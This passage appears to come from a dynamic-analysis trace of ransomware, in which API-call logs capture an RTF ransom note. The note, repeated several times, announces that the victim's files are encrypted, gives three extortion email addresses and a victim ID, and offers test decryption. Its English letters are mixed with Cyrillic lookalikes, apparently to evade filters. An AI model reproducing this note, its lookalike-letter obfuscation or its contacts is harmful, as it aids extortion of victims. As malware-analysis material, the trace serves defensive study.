possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0078.577] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0078.577] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g 